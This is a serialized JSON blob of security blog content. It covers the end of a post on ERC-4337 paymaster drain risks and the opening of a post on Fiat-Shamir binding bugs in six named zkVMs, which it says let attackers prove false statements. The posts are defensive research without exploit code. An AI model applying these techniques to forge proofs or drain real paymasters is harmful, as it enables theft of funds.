",{"type":26,"tag":130,"props":110268,"children":110270},{"className":110269},[],[110271],{"type":32,"value":104763},{"type":32,"value":110273}," is submitted via ",{"type":26,"tag":130,"props":110275,"children":110277},{"className":110276},[],[110278],{"type":32,"value":110279},"handleOps",{"type":32,"value":110281},". This means the ",{"type":26,"tag":130,"props":110283,"children":110285},{"className":110284},[],[110286],{"type":32,"value":107020},{"type":32,"value":110288}," will pass simulation but fail during actual execution, allowing the bundler to drain the paymaster's deposit from the EntryPoint.",{"type":26,"tag":35,"props":110290,"children":110291},{},[110292],{"type":32,"value":110293},"To protect against this vulnerability, paymasters should implement pre-execution charging patterns rather than post-execution charging. This means requiring users to pre-fund the full estimated gas cost during the validation phase, before the operation executes. By collecting payment upfront, the paymaster is protected against failed post-execution transfers that could be exploited by malicious bundlers.",{"type":26,"tag":35,"props":110295,"children":110296},{},[110297],{"type":32,"value":110298},"If post-execution charging is absolutely necessary for UX reasons, paymasters have several mitigation strategies available. One approach is to restrict usage to a whitelist of trusted bundlers, though this introduces centralization concerns. Alternatively, Pimlico tries to address this issue by tightening API limits and constraining ERC-20 usage for its users.",{"type":26,"tag":35,"props":110300,"children":110301},{},[110302],{"type":32,"value":110303},"The most secure approach is to require upfront pre-funding, even though it may temporarily lock more user funds. This small UX tradeoff is worth the strong security guarantees it provides against paymaster exploitation.",{"type":26,"tag":27,"props":110305,"children":110306},{"id":31526},[110307],{"type":32,"value":21540},{"type":26,"tag":35,"props":110309,"children":110310},{},[110311],{"type":32,"value":110312},"ERC-4337 paymasters enable powerful new UX patterns by abstracting away gas costs from end users. However, implementing them securely requires careful consideration of the standard's execution flow and potential attack vectors. The key lessons are:",{"type":26,"tag":4820,"props":110314,"children":110315},{},[110316,110321,110326,110331,110336],{"type":26,"tag":3430,"props":110317,"children":110318},{},[110319],{"type":32,"value":110320},"Always collect full payment during validation, not after execution",{"type":26,"tag":3430,"props":110322,"children":110323},{},[110324],{"type":32,"value":110325},"Be conservative with gas estimations and include safety margins",{"type":26,"tag":3430,"props":110327,"children":110328},{},[110329],{"type":32,"value":110330},"Carefully validate all user inputs and token transfers",{"type":26,"tag":3430,"props":110332,"children":110333},{},[110334],{"type":32,"value":110335},"Test extensively, including simulation of malicious behavior",{"type":26,"tag":3430,"props":110337,"children":110338},{},[110339,110341,110346],{"type":32,"value":110340},"Always review changes in new ",{"type":26,"tag":130,"props":110342,"children":110344},{"className":110343},[],[110345],{"type":32,"value":104844},{"type":32,"value":110347}," versions, as they may impact your paymaster's design and security assumptions",{"type":26,"tag":35,"props":110349,"children":110350},{},[110351,110353,110358,110360,110365,110367,110372],{"type":32,"value":110352},"The last point is particularly important as the ERC-4337 standard continues to evolve. Changes to the ",{"type":26,"tag":130,"props":110354,"children":110356},{"className":110355},[],[110357],{"type":32,"value":104844},{"type":32,"value":110359}," contract's behavior could potentially break existing ",{"type":26,"tag":130,"props":110361,"children":110363},{"className":110362},[],[110364],{"type":32,"value":104916},{"type":32,"value":110366}," implementations or introduce new security considerations. Developers should thoroughly review release notes and diffs when upgrading to new ",{"type":26,"tag":130,"props":110368,"children":110370},{"className":110369},[],[110371],{"type":32,"value":104844},{"type":32,"value":110373}," versions.",{"type":26,"tag":35,"props":110375,"children":110376},{},[110377],{"type":32,"value":110378},"By following these best practices, developers can build robust paymasters that enhance UX while protecting against exploitation. As the ERC-4337 ecosystem matures, secure paymaster implementations will be crucial for driving mainstream adoption of account abstraction.",{"type":26,"tag":35,"props":110380,"children":110381},{},[110382],{"type":32,"value":110383},"If you're building a paymaster and want to ensure it's secure against these and other vulnerabilities, consider getting an audit from us. Our team has extensive experience auditing ERC-4337 implementations and can help identify potential security issues before they impact production.",{"type":26,"tag":7949,"props":110385,"children":110386},{},[110387],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":110389},[110390,110391,110392,110399,110404,110405],{"id":104678,"depth":5412,"text":104681},{"id":104694,"depth":5412,"text":104697},{"id":104733,"depth":5412,"text":104736,"children":110393},[110394,110395,110396,110397,110398],{"id":104756,"depth":5417,"text":104763},{"id":104797,"depth":5417,"text":104800},{"id":104823,"depth":5417,"text":104826},{"id":17314,"depth":5417,"text":104844},{"id":104916,"depth":5417,"text":104927},{"id":104979,"depth":5412,"text":110400,"children":110401},"Understanding the EntryPoint's Flow",[110402,110403],{"id":105035,"depth":5417,"text":105038},{"id":105220,"depth":5417,"text":105223},{"id":105463,"depth":5412,"text":105469},{"id":107063,"depth":5412,"text":107069,"children":110406},[110407,110408],{"id":107123,"depth":5417,"text":107126},{"id":107182,"depth":5417,"text":107185},"content:blog:2025-12-02-paymasters-evm.md","blog/2025-12-02-paymasters-evm.md","blog/2025-12-02-paymasters-evm",{"_path":110413,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":110414,"description":110415,"date":110416,"author":110417,"image":110418,"isFeatured":18,"onBlogPage":18,"tags":110420,"body":110422,"_type":5433,"_id":126201,"_source":5435,"_file":126202,"_stem":126203,"_extension":5438},"/blog/2026-03-03-zkvms-unfaithful-claims","Unfaithful Claims: Breaking 6 zkVMs","A zkVM verifier should be faithful to one thing above all else: its public claims. Yet we found six systems where this guarantee breaks. Learn how a subtle ordering bug lets an attacker bypass the cryptography entirely and prove mathematically impossible statements.","2026-03-03T12:00:00.000Z",[12,13],{"src":110419,"width":16,"height":17},"/posts/zkvms-unfaithful-claims/title.png",[110421],"zkVM",{"type":23,"children":110423,"toc":126165},[110424,110429,110471,110484,110487,110493,110498,110626,110629,110635,110641,110646,110678,110826,110831,110954,110965,110976,110999,111010,111015,111048,111056,111061,111064,111070,111075,111081,111086,111091,111099,111117,111258,111263,111269,111361,112094,112162,112173,112181,112652,112658,113097,113437,113589,113594,114481,114637,114643,114735,114740,115325,115775,115851,115857,115862,115931,115941,115957,115967,116028,116445,116477,116487,116661,116666,116676,117276,117464,117482,117485,117491,117496,117504,117536,117897,117902,117985,117988,117994,118002,118007,118010,118016,118021,118029,118037,118045,118053,118086,118094,118102,118193,118444,118771,118779,118809,118978,119304,119309,119314,119331,119334,119339,119344,119356,119368,119959,119971,119983,119990,119998,120010,120018,120033,120038,120318,120337,120432,120451,120467,120470,120476,120481,120486,120493,120501,120508,120516,120529,120547,121006,121108,121113,121118,121134,121137,121143,121148,121160,121171,121176,121566,121573,121581,121606,121626,121882,121893,121912,122296,122642,122872,123031,123191,123759,123764,123790,123793,123799,123804,123811,123819,123832,123904,123915,123923,123933,123941,123952,124226,124315,124344,124347,124352,124484,124496,124503,124508,124661,124687,124694,124702,124707,124773,124778,125168,125255,125271,125274,125280,125285,125291,125389,125448,125453,125459,125464,125472,125477,125483,125488,125493,125499,125504,125507,125513,125519,125524,125529,125534,125539,125544,125547,125553,125711,125716,125719,125724,125735,126050,126055,126079,126084,126102,126107,126110,126116,126121,126126,126136,126141,126151,126161],{"type":26,"tag":35,"props":110425,"children":110426},{},[110427],{"type":32,"value":110428},"A zkVM verifier should be faithful to one thing above all else: its public claims. If the claimed input/output statement is false, verification must fail.",{"type":26,"tag":35,"props":110430,"children":110431},{},[110432,110434,110439,110440,110445,110446,110451,110452,110457,110458,110463,110464,110469],{"type":32,"value":110433},"We found six systems where this faithfulness breaks. Across ",{"type":26,"tag":84,"props":110435,"children":110436},{},[110437],{"type":32,"value":110438},"Jolt",{"type":32,"value":1108},{"type":26,"tag":84,"props":110441,"children":110442},{},[110443],{"type":32,"value":110444},"Nexus",{"type":32,"value":1108},{"type":26,"tag":84,"props":110447,"children":110448},{},[110449],{"type":32,"value":110450},"Cairo-M",{"type":32,"value":1108},{"type":26,"tag":84,"props":110453,"children":110454},{},[110455],{"type":32,"value":110456},"Ceno",{"type":32,"value":1108},{"type":26,"tag":84,"props":110459,"children":110460},{},[110461],{"type":32,"value":110462},"Expander",{"type":32,"value":3525},{"type":26,"tag":84,"props":110465,"children":110466},{},[110467],{"type":32,"value":110468},"Binius64",{"type":32,"value":110470},", public-claim data was not always bound into Fiat-Shamir transcripts before challenge generation. That subtle ordering bug turns statement values into attacker-controlled variables in later verification equations.",{"type":26,"tag":35,"props":110472,"children":110473},{},[110474,110476,110482],{"type":32,"value":110475},"In this post, we demonstrate how to exploit these unbound variables to bypass the cryptography entirely and prove mathematically impossible statements, such as finding a counterexample to Fermat's Last Theorem (see ",{"type":26,"tag":41,"props":110477,"children":110479},{"href":110478},"#challenges",[110480],{"type":32,"value":110481},"Challenges",{"type":32,"value":110483}," to try this out yourself). In a blockchain context, this could translate to receiving $1M out of thin air.",{"type":26,"tag":3265,"props":110485,"children":110486},{},[],{"type":26,"tag":92,"props":110488,"children":110490},{"id":110489},"jargon-cheat-sheet",[110491],{"type":32,"value":110492},"Jargon Cheat Sheet",{"type":26,"tag":35,"props":110494,"children":110495},{},[110496],{"type":32,"value":110497},"Before we go deeper, here's a one-liner for every term you'll encounter. The ZK ecosystem is particularly full of jargon and abbreviations, which may be off-putting to newcomers. Bookmark this section.",{"type":26,"tag":3426,"props":110499,"children":110500},{},[110501,110511,110521,110531,110541,110551,110561,110571,110581,110591,110601,110611],{"type":26,"tag":3430,"props":110502,"children":110503},{},[110504,110509],{"type":26,"tag":84,"props":110505,"children":110506},{},[110507],{"type":32,"value":110508},"Fiat-Shamir",{"type":32,"value":110510},": Instead of a real verifier sending random challenges, hash everything so far to get \"random\" challenges. Makes proofs non-interactive.",{"type":26,"tag":3430,"props":110512,"children":110513},{},[110514,110519],{"type":26,"tag":84,"props":110515,"children":110516},{},[110517],{"type":32,"value":110518},"Transcript",{"type":32,"value":110520},": The running hash state. You \"absorb\" data into it, then \"squeeze\" out challenges.",{"type":26,"tag":3430,"props":110522,"children":110523},{},[110524,110529],{"type":26,"tag":84,"props":110525,"children":110526},{},[110527],{"type":32,"value":110528},"Polynomial Commitment",{"type":32,"value":110530},": Like a hash, but for polynomials. You commit to a polynomial, then later prove \"my polynomial evaluates to 42 at point 7\" without revealing the whole polynomial.",{"type":26,"tag":3430,"props":110532,"children":110533},{},[110534,110539],{"type":26,"tag":84,"props":110535,"children":110536},{},[110537],{"type":32,"value":110538},"Sumcheck",{"type":32,"value":110540},": A protocol to prove \"this polynomial sums to H over all boolean inputs\" without actually computing the exponentially many terms. Reduces to checking one random point.",{"type":26,"tag":3430,"props":110542,"children":110543},{},[110544,110549],{"type":26,"tag":84,"props":110545,"children":110546},{},[110547],{"type":32,"value":110548},"MLE (Multilinear Extension)",{"type":32,"value":110550},": Turn a table of values into a polynomial. The polynomial equals the table on 0/1 inputs and smoothly interpolates elsewhere. Key property: evaluating it is a linear function of the table entries.",{"type":26,"tag":3430,"props":110552,"children":110553},{},[110554,110559],{"type":26,"tag":84,"props":110555,"children":110556},{},[110557],{"type":32,"value":110558},"Lookup / LogUp",{"type":32,"value":110560},": Prove \"all my values appear in this table\" by encoding membership as sums of fractions. If the sums match, the sets match (with high probability).",{"type":26,"tag":3430,"props":110562,"children":110563},{},[110564,110569],{"type":26,"tag":84,"props":110565,"children":110566},{},[110567],{"type":32,"value":110568},"AIR",{"type":32,"value":110570},": \"Algebraic Intermediate Representation\" - a way to write \"valid execution trace\" as polynomial equations. If the equations hold, the trace is valid.",{"type":26,"tag":3430,"props":110572,"children":110573},{},[110574,110579],{"type":26,"tag":84,"props":110575,"children":110576},{},[110577],{"type":32,"value":110578},"STARK",{"type":32,"value":110580},": Prove AIR constraints hold using commitments + random sampling + FRI. No trusted setup needed.",{"type":26,"tag":3430,"props":110582,"children":110583},{},[110584,110589],{"type":26,"tag":84,"props":110585,"children":110586},{},[110587],{"type":32,"value":110588},"FRI",{"type":32,"value":110590},": \"Fast Reed-Solomon IOP\" - proves a committed function is actually a low-degree polynomial, not arbitrary garbage that passes spot-checks.",{"type":26,"tag":3430,"props":110592,"children":110593},{},[110594,110599],{"type":26,"tag":84,"props":110595,"children":110596},{},[110597],{"type":32,"value":110598},"OODS",{"type":32,"value":110600},": \"Out-of-Domain Sampling\" - check the constraint polynomial at a random point outside the execution domain. Ties everything together.",{"type":26,"tag":3430,"props":110602,"children":110603},{},[110604,110609],{"type":26,"tag":84,"props":110605,"children":110606},{},[110607],{"type":32,"value":110608},"GKR",{"type":32,"value":110610},": Verify arithmetic circuits layer-by-layer using sumcheck. Reduces \"check this huge circuit\" to \"check a few random evaluations.\"",{"type":26,"tag":3430,"props":110612,"children":110613},{},[110614,110619,110621],{"type":26,"tag":84,"props":110615,"children":110616},{},[110617],{"type":32,"value":110618},"claimed_sum / opening_claim",{"type":32,"value":110620},": Prover-supplied values that feed into verification equations. ",{"type":26,"tag":84,"props":110622,"children":110623},{},[110624],{"type":32,"value":110625},"These are the usual suspects for binding bugs.",{"type":26,"tag":3265,"props":110627,"children":110628},{},[],{"type":26,"tag":92,"props":110630,"children":110632},{"id":110631},"what-are-we-even-breaking",[110633],{"type":32,"value":110634},"What Are We Even Breaking?",{"type":26,"tag":118,"props":110636,"children":110638},{"id":110637},"what-is-a-zkvm",[110639],{"type":32,"value":110640},"What is a zkVM?",{"type":26,"tag":35,"props":110642,"children":110643},{},[110644],{"type":32,"value":110645},"A zkVM proof claims that a program executed correctly on public inputs, producing the claimed public output, while hiding the full execution trace.",{"type":26,"tag":35,"props":110647,"children":110648},{},[110649,110651,110676],{"type":32,"value":110650},"Formally, the verifier is convinced that there exists a valid trace ",{"type":26,"tag":130,"props":110652,"children":110654},{"className":110653},[133,134],[110655],{"type":26,"tag":137,"props":110656,"children":110658},{"className":110657},[140],[110659],{"type":26,"tag":137,"props":110660,"children":110662},{"className":110661,"ariaHidden":146},[145],[110663],{"type":26,"tag":137,"props":110664,"children":110666},{"className":110665},[151],[110667,110671],{"type":26,"tag":137,"props":110668,"children":110670},{"className":110669,"style":1512},[156],[],{"type":26,"tag":137,"props":110672,"children":110674},{"className":110673,"style":1731},[169,170],[110675],{"type":32,"value":2064},{"type":32,"value":110677}," such that:",{"type":26,"tag":35,"props":110679,"children":110680},{},[110681],{"type":26,"tag":130,"props":110682,"children":110684},{"className":110683},[133,134],[110685],{"type":26,"tag":137,"props":110686,"children":110688},{"className":110687},[140],[110689],{"type":26,"tag":137,"props":110690,"children":110692},{"className":110691,"ariaHidden":146},[145],[110693,110737,110812],{"type":26,"tag":137,"props":110694,"children":110696},{"className":110695},[151],[110697,110701,110707,110711,110716,110720,110724,110729,110733],{"type":26,"tag":137,"props":110698,"children":110700},{"className":110699,"style":95563},[156],[],{"type":26,"tag":137,"props":110702,"children":110704},{"className":110703},[169],[110705],{"type":32,"value":110706},"∃",{"type":26,"tag":137,"props":110708,"children":110710},{"className":110709,"style":281},[184],[],{"type":26,"tag":137,"props":110712,"children":110714},{"className":110713,"style":1731},[169,170],[110715],{"type":32,"value":2064},{"type":26,"tag":137,"props":110717,"children":110719},{"className":110718,"style":281},[184],[],{"type":26,"tag":137,"props":110721,"children":110723},{"className":110722,"style":281},[184],[],{"type":26,"tag":137,"props":110725,"children":110727},{"className":110726},[286],[110728],{"type":32,"value":7072},{"type":26,"tag":137,"props":110730,"children":110732},{"className":110731,"style":281},[184],[],{"type":26,"tag":137,"props":110734,"children":110736},{"className":110735,"style":281},[184],[],{"type":26,"tag":137,"props":110738,"children":110740},{"className":110739},[151],[110741,110745,110756,110761,110766,110771,110775,110780,110785,110789,110794,110799,110803,110808],{"type":26,"tag":137,"props":110742,"children":110744},{"className":110743,"style":157},[156],[],{"type":26,"tag":137,"props":110746,"children":110748},{"className":110747},[169],[110749],{"type":26,"tag":137,"props":110750,"children":110753},{"className":110751},[169,110752],"mathsf",[110754],{"type":32,"value":110755},"VM",{"type":26,"tag":137,"props":110757,"children":110759},{"className":110758},[162],[110760],{"type":32,"value":165},{"type":26,"tag":137,"props":110762,"children":110764},{"className":110763,"style":1731},[169,170],[110765],{"type":32,"value":24181},{"type":26,"tag":137,"props":110767,"children":110769},{"className":110768},[177],[110770],{"type":32,"value":180},{"type":26,"tag":137,"props":110772,"children":110774},{"className":110773,"style":185},[184],[],{"type":26,"tag":137,"props":110776,"children":110778},{"className":110777,"style":97651},[169,170],[110779],{"type":32,"value":8718},{"type":26,"tag":137,"props":110781,"children":110783},{"className":110782},[177],[110784],{"type":32,"value":180},{"type":26,"tag":137,"props":110786,"children":110788},{"className":110787,"style":185},[184],[],{"type":26,"tag":137,"props":110790,"children":110792},{"className":110791,"style":1731},[169,170],[110793],{"type":32,"value":2064},{"type":26,"tag":137,"props":110795,"children":110797},{"className":110796},[197],[110798],{"type":32,"value":200},{"type":26,"tag":137,"props":110800,"children":110802},{"className":110801,"style":281},[184],[],{"type":26,"tag":137,"props":110804,"children":110806},{"className":110805},[286],[110807],{"type":32,"value":24913},{"type":26,"tag":137,"props":110809,"children":110811},{"className":110810,"style":281},[184],[],{"type":26,"tag":137,"props":110813,"children":110815},{"className":110814},[151],[110816,110820],{"type":26,"tag":137,"props":110817,"children":110819},{"className":110818,"style":1512},[156],[],{"type":26,"tag":137,"props":110821,"children":110824},{"className":110822,"style":110823},[169,170],"margin-right:0.22222em;",[110825],{"type":32,"value":8748},{"type":26,"tag":35,"props":110827,"children":110828},{},[110829],{"type":32,"value":110830},"where:",{"type":26,"tag":3426,"props":110832,"children":110833},{},[110834,110864,110894,110924],{"type":26,"tag":3430,"props":110835,"children":110836},{},[110837,110862],{"type":26,"tag":130,"props":110838,"children":110840},{"className":110839},[133,134],[110841],{"type":26,"tag":137,"props":110842,"children":110844},{"className":110843},[140],[110845],{"type":26,"tag":137,"props":110846,"children":110848},{"className":110847,"ariaHidden":146},[145],[110849],{"type":26,"tag":137,"props":110850,"children":110852},{"className":110851},[151],[110853,110857],{"type":26,"tag":137,"props":110854,"children":110856},{"className":110855,"style":1512},[156],[],{"type":26,"tag":137,"props":110858,"children":110860},{"className":110859,"style":1731},[169,170],[110861],{"type":32,"value":24181},{"type":32,"value":110863}," = program/circuit description (public)",{"type":26,"tag":3430,"props":110865,"children":110866},{},[110867,110892],{"type":26,"tag":130,"props":110868,"children":110870},{"className":110869},[133,134],[110871],{"type":26,"tag":137,"props":110872,"children":110874},{"className":110873},[140],[110875],{"type":26,"tag":137,"props":110876,"children":110878},{"className":110877,"ariaHidden":146},[145],[110879],{"type":26,"tag":137,"props":110880,"children":110882},{"className":110881},[151],[110883,110887],{"type":26,"tag":137,"props":110884,"children":110886},{"className":110885,"style":1512},[156],[],{"type":26,"tag":137,"props":110888,"children":110890},{"className":110889,"style":97651},[169,170],[110891],{"type":32,"value":8718},{"type":32,"value":110893}," = public input",{"type":26,"tag":3430,"props":110895,"children":110896},{},[110897,110922],{"type":26,"tag":130,"props":110898,"children":110900},{"className":110899},[133,134],[110901],{"type":26,"tag":137,"props":110902,"children":110904},{"className":110903},[140],[110905],{"type":26,"tag":137,"props":110906,"children":110908},{"className":110907,"ariaHidden":146},[145],[110909],{"type":26,"tag":137,"props":110910,"children":110912},{"className":110911},[151],[110913,110917],{"type":26,"tag":137,"props":110914,"children":110916},{"className":110915,"style":1512},[156],[],{"type":26,"tag":137,"props":110918,"children":110920},{"className":110919,"style":110823},[169,170],[110921],{"type":32,"value":8748},{"type":32,"value":110923}," = claimed public output",{"type":26,"tag":3430,"props":110925,"children":110926},{},[110927,110952],{"type":26,"tag":130,"props":110928,"children":110930},{"className":110929},[133,134],[110931],{"type":26,"tag":137,"props":110932,"children":110934},{"className":110933},[140],[110935],{"type":26,"tag":137,"props":110936,"children":110938},{"className":110937,"ariaHidden":146},[145],[110939],{"type":26,"tag":137,"props":110940,"children":110942},{"className":110941},[151],[110943,110947],{"type":26,"tag":137,"props":110944,"children":110946},{"className":110945,"style":1512},[156],[],{"type":26,"tag":137,"props":110948,"children":110950},{"className":110949,"style":1731},[169,170],[110951],{"type":32,"value":2064},{"type":32,"value":110953}," = private witness/trace (registers, memory history, intermediate values)",{"type":26,"tag":35,"props":110955,"children":110956},{},[110957,110959,110963],{"type":32,"value":110958},"The verifier does ",{"type":26,"tag":84,"props":110960,"children":110961},{},[110962],{"type":32,"value":4194},{"type":32,"value":110964}," replay execution step by step. Instead, it checks algebraic constraints over committed polynomials.",{"type":26,"tag":35,"props":110966,"children":110967},{},[110968,110970,110975],{"type":32,"value":110969},"Some systems in this post are verifiable-computing systems rather than full zero-knowledge systems, but the critical property is still ",{"type":26,"tag":84,"props":110971,"children":110972},{},[110973],{"type":32,"value":110974},"soundness",{"type":32,"value":7072},{"type":26,"tag":3426,"props":110977,"children":110978},{},[110979,110989],{"type":26,"tag":3430,"props":110980,"children":110981},{},[110982,110987],{"type":26,"tag":84,"props":110983,"children":110984},{},[110985],{"type":32,"value":110986},"Completeness",{"type":32,"value":110988},": honest execution verifies.",{"type":26,"tag":3430,"props":110990,"children":110991},{},[110992,110997],{"type":26,"tag":84,"props":110993,"children":110994},{},[110995],{"type":32,"value":110996},"Soundness",{"type":32,"value":110998},": false execution should not verify.",{"type":26,"tag":35,"props":111000,"children":111001},{},[111002,111004,111008],{"type":32,"value":111003},"We are breaking ",{"type":26,"tag":84,"props":111005,"children":111006},{},[111007],{"type":32,"value":110974},{"type":32,"value":111009}," in all six systems.",{"type":26,"tag":35,"props":111011,"children":111012},{},[111013],{"type":32,"value":111014},"In all six codebases, verification follows this abstract flow:",{"type":26,"tag":4820,"props":111016,"children":111017},{},[111018,111023,111028,111033,111038,111043],{"type":26,"tag":3430,"props":111019,"children":111020},{},[111021],{"type":32,"value":111022},"Fix public statement data.",{"type":26,"tag":3430,"props":111024,"children":111025},{},[111026],{"type":32,"value":111027},"Parse proof payload (commitments, reduction messages, openings).",{"type":26,"tag":3430,"props":111029,"children":111030},{},[111031],{"type":32,"value":111032},"Rebuild Fiat-Shamir challenges from transcript state.",{"type":26,"tag":3430,"props":111034,"children":111035},{},[111036],{"type":32,"value":111037},"Check constraint equations at sampled points.",{"type":26,"tag":3430,"props":111039,"children":111040},{},[111041],{"type":32,"value":111042},"Check PCS/opening consistency.",{"type":26,"tag":3430,"props":111044,"children":111045},{},[111046],{"type":32,"value":111047},"Accept only if all checks are jointly consistent.",{"type":26,"tag":35,"props":111049,"children":111050},{},[111051],{"type":26,"tag":2210,"props":111052,"children":111055},{"alt":111053,"src":111054},"1_prover_verifier","/posts/zkvms-unfaithful-claims/1_prover_verifier.svg",[],{"type":26,"tag":35,"props":111057,"children":111058},{},[111059],{"type":32,"value":111060},"The non-negotiable invariant is transcript ordering: if a value affects a verifier equation, it must be absorbed before sampling the challenge that gates that equation. Violating this gives the prover an attacker-controlled degree of freedom.",{"type":26,"tag":3265,"props":111062,"children":111063},{},[],{"type":26,"tag":92,"props":111065,"children":111067},{"id":111066},"the-building-blocks",[111068],{"type":32,"value":111069},"The Building Blocks",{"type":26,"tag":35,"props":111071,"children":111072},{},[111073],{"type":32,"value":111074},"Before we can understand the bugs, we need to understand the protocols they break. Each of these is a tool that zkVMs compose together.",{"type":26,"tag":118,"props":111076,"children":111078},{"id":111077},"the-fiat-shamir-transform",[111079],{"type":32,"value":111080},"The Fiat-Shamir Transform",{"type":26,"tag":35,"props":111082,"children":111083},{},[111084],{"type":32,"value":111085},"Interactive protocols (the type most commonly described in literature) require real-time communication. It involves the verifier sending random challenges, and the prover responding to them. This doesn't work for blockchains (where you have no real-time verifier) or when you want anyone to verify your proof at a later point.",{"type":26,"tag":35,"props":111087,"children":111088},{},[111089],{"type":32,"value":111090},"The solution is to replace the verifier's randomness with a hash function. The prover \"talks to themselves,\" using the hash of everything so far as the challenge. If we use a cryptographic hash function, this should mean that the challenges are completely unpredictable.",{"type":26,"tag":35,"props":111092,"children":111093},{},[111094],{"type":26,"tag":2210,"props":111095,"children":111098},{"alt":111096,"src":111097},"fiat_shamir2","/posts/zkvms-unfaithful-claims/fiat_shamir2.svg",[],{"type":26,"tag":35,"props":111100,"children":111101},{},[111102,111104,111108,111110,111115],{"type":32,"value":111103},"The hash (transcript) ",{"type":26,"tag":84,"props":111105,"children":111106},{},[111107],{"type":32,"value":9103},{"type":32,"value":111109}," include everything that affects verification ",{"type":26,"tag":84,"props":111111,"children":111112},{},[111113],{"type":32,"value":111114},"BEFORE",{"type":32,"value":111116}," the challenges derived from it are used.",{"type":26,"tag":35,"props":111118,"children":111119},{},[111120,111122,111148,111150,111175,111177,111202,111204,111229,111231,111256],{"type":32,"value":111121},"If some value ",{"type":26,"tag":130,"props":111123,"children":111125},{"className":111124},[133,134],[111126],{"type":26,"tag":137,"props":111127,"children":111129},{"className":111128},[140],[111130],{"type":26,"tag":137,"props":111131,"children":111133},{"className":111132,"ariaHidden":146},[145],[111134],{"type":26,"tag":137,"props":111135,"children":111137},{"className":111136},[151],[111138,111142],{"type":26,"tag":137,"props":111139,"children":111141},{"className":111140,"style":1512},[156],[],{"type":26,"tag":137,"props":111143,"children":111145},{"className":111144,"style":110823},[169,170],[111146],{"type":32,"value":111147},"V",{"type":32,"value":111149}," affects a verification equation, but ",{"type":26,"tag":130,"props":111151,"children":111153},{"className":111152},[133,134],[111154],{"type":26,"tag":137,"props":111155,"children":111157},{"className":111156},[140],[111158],{"type":26,"tag":137,"props":111159,"children":111161},{"className":111160,"ariaHidden":146},[145],[111162],{"type":26,"tag":137,"props":111163,"children":111165},{"className":111164},[151],[111166,111170],{"type":26,"tag":137,"props":111167,"children":111169},{"className":111168,"style":1512},[156],[],{"type":26,"tag":137,"props":111171,"children":111173},{"className":111172,"style":110823},[169,170],[111174],{"type":32,"value":111147},{"type":32,"value":111176}," isn't absorbed before the relevant challenge is squeezed, then the challenge is completely independent of ",{"type":26,"tag":130,"props":111178,"children":111180},{"className":111179},[133,134],[111181],{"type":26,"tag":137,"props":111182,"children":111184},{"className":111183},[140],[111185],{"type":26,"tag":137,"props":111186,"children":111188},{"className":111187,"ariaHidden":146},[145],[111189],{"type":26,"tag":137,"props":111190,"children":111192},{"className":111191},[151],[111193,111197],{"type":26,"tag":137,"props":111194,"children":111196},{"className":111195,"style":1512},[156],[],{"type":26,"tag":137,"props":111198,"children":111200},{"className":111199,"style":110823},[169,170],[111201],{"type":32,"value":111147},{"type":32,"value":111203},". This means that the prover can \"see\" (compute in advance) the challenge before choosing ",{"type":26,"tag":130,"props":111205,"children":111207},{"className":111206},[133,134],[111208],{"type":26,"tag":137,"props":111209,"children":111211},{"className":111210},[140],[111212],{"type":26,"tag":137,"props":111213,"children":111215},{"className":111214,"ariaHidden":146},[145],[111216],{"type":26,"tag":137,"props":111217,"children":111219},{"className":111218},[151],[111220,111224],{"type":26,"tag":137,"props":111221,"children":111223},{"className":111222,"style":1512},[156],[],{"type":26,"tag":137,"props":111225,"children":111227},{"className":111226,"style":110823},[169,170],[111228],{"type":32,"value":111147},{"type":32,"value":111230},", which may allow it to choose ",{"type":26,"tag":130,"props":111232,"children":111234},{"className":111233},[133,134],[111235],{"type":26,"tag":137,"props":111236,"children":111238},{"className":111237},[140],[111239],{"type":26,"tag":137,"props":111240,"children":111242},{"className":111241,"ariaHidden":146},[145],[111243],{"type":26,"tag":137,"props":111244,"children":111246},{"className":111245},[151],[111247,111251],{"type":26,"tag":137,"props":111248,"children":111250},{"className":111249,"style":1512},[156],[],{"type":26,"tag":137,"props":111252,"children":111254},{"className":111253,"style":110823},[169,170],[111255],{"type":32,"value":111147},{"type":32,"value":111257}," exactly so that the verification passes, even though it should not.",{"type":26,"tag":35,"props":111259,"children":111260},{},[111261],{"type":32,"value":111262},"This is the bug class we found in all six systems.",{"type":26,"tag":118,"props":111264,"children":111266},{"id":111265},"the-sumcheck-protocol",[111267],{"type":32,"value":111268},"The Sumcheck Protocol",{"type":26,"tag":35,"props":111270,"children":111271},{},[111272,111274,111359],{"type":32,"value":111273},"The sumcheck protocol proves that a polynomial sums to a claimed value over the Boolean hypercube (all inputs in ",{"type":26,"tag":130,"props":111275,"children":111277},{"className":111276},[133,134],[111278],{"type":26,"tag":137,"props":111279,"children":111281},{"className":111280},[140],[111282],{"type":26,"tag":137,"props":111283,"children":111285},{"className":111284,"ariaHidden":146},[145],[111286],{"type":26,"tag":137,"props":111287,"children":111289},{"className":111288},[151],[111290,111294,111299,111304,111309,111313,111318],{"type":26,"tag":137,"props":111291,"children":111293},{"className":111292,"style":157},[156],[],{"type":26,"tag":137,"props":111295,"children":111297},{"className":111296},[162],[111298],{"type":32,"value":79221},{"type":26,"tag":137,"props":111300,"children":111302},{"className":111301},[169],[111303],{"type":32,"value":1817},{"type":26,"tag":137,"props":111305,"children":111307},{"className":111306},[177],[111308],{"type":32,"value":180},{"type":26,"tag":137,"props":111310,"children":111312},{"className":111311,"style":185},[184],[],{"type":26,"tag":137,"props":111314,"children":111316},{"className":111315},[169],[111317],{"type":32,"value":878},{"type":26,"tag":137,"props":111319,"children":111321},{"className":111320},[197],[111322,111327],{"type":26,"tag":137,"props":111323,"children":111325},{"className":111324},[197],[111326],{"type":32,"value":36736},{"type":26,"tag":137,"props":111328,"children":111330},{"className":111329},[236],[111331],{"type":26,"tag":137,"props":111332,"children":111334},{"className":111333},[241],[111335],{"type":26,"tag":137,"props":111336,"children":111338},{"className":111337},[246],[111339],{"type":26,"tag":137,"props":111340,"children":111342},{"className":111341,"style":1908},[251],[111343],{"type":26,"tag":137,"props":111344,"children":111345},{"style":256},[111346,111350],{"type":26,"tag":137,"props":111347,"children":111349},{"className":111348,"style":262},[261],[],{"type":26,"tag":137,"props":111351,"children":111353},{"className":111352},[267,268,269,270],[111354],{"type":26,"tag":137,"props":111355,"children":111357},{"className":111356},[169,170,270],[111358],{"type":32,"value":1549},{"type":32,"value":111360},"), i.e the 